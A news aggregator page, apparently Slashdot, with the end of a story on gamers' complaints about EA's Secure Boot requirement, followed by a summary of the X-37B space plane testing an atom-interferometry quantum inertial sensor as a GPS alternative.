Despite all these justifications for the Secure Boot requirement on EA's part, it hasn't been hard to find people complaining about what they see as an onerous barrier to playing an online shooter. A quick Reddit search turns up dozens of posts complaining about the difficulty of getting Secure Boot on certain PC configurations or expressing discomfort about installing what they consider a "malware rootkit" on their machine. "I want to play this beta but A) I'm worried about bricking my PC. B) I'm worried about giving EA complete access to my machine," one representative Redditor wrote.

Space

America's Secretive X-37B Space Plane Will Test a Quantum Alternative to GPS for the US Space Force (space.com) 22

The mysterious X-37B space-plane — the U.S. military's orbital test vehicle — "serves partly as a platform for cutting-edge experiments," writes Space.com

And "one of these experiments is a potential alternative to GPS that makes use of quantum science as a tool for navigation: a quantum inertial sensor." This technology could revolutionize how spacecraft, airplanes, ships and submarines navigate in environments where GPS is unavailable or compromised. In space, especially beyond Earth's orbit, GPS signals become unreliable or simply vanish. The same applies underwater, where submarines cannot access GPS at all. And even on Earth, GPS signals can be jammed (blocked), spoofed (making a GPS receiver think it is in a different location) or disabled — for instance, during a conflict... Traditional inertial navigation systems, which use accelerometers and gyroscopes to measure a vehicle's acceleration and rotation, do provide independent navigation, as they can estimate position by tracking how the vehicle moves over time... Eventually though, without visual cues, small errors will accumulate and you will entirely lose your positioning...

At very low temperatures, atoms obey the rules of quantum mechanics: they behave like waves and can exist in multiple states simultaneously — two properties that lie at the heart of quantum inertial sensors. The quantum inertial sensor aboard the X-37B uses a technique called atom interferometry, where atoms are cooled to the temperature of near absolute zero, so they behave like waves. Using fine-tuned lasers, each atom is split into what's called a superposition state, similar to Schrödinger's cat, so that it simultaneously travels along two paths, which are then recombined.

Since the atom behaves like a wave in quantum mechanics, these two paths interfere with each other, creating a pattern similar to overlapping ripples on water. Encoded in this pattern is detailed information about how the atom's environment has affected its journey. In particular, the tiniest shifts in motion, like sensor rotations or accelerations, leave detectable marks on these atomic "waves". Compared to classical inertial navigation systems, quantum sensors offer orders of magnitude greater sensitivity. Because atoms are identical and do not change, unlike mechanical components or electronics, they are far less prone to drift or bias. The result is long duration and high accuracy navigation without the need for external references.

The upcoming X-37B mission will be the first time this level of quantum inertial navigation is tested in space.

The article points out that a quantum navigation system could be crucial "for future space exploration, such as to the Moon, Mars or even deep space," where autonomy is key and when signals from Earth are unavailable.

"While quantum computing and quantum communication often steal headlines, systems like quantum clocks and quantum sensors are likely to be the first to see widespread use."

Slashdot Top Deals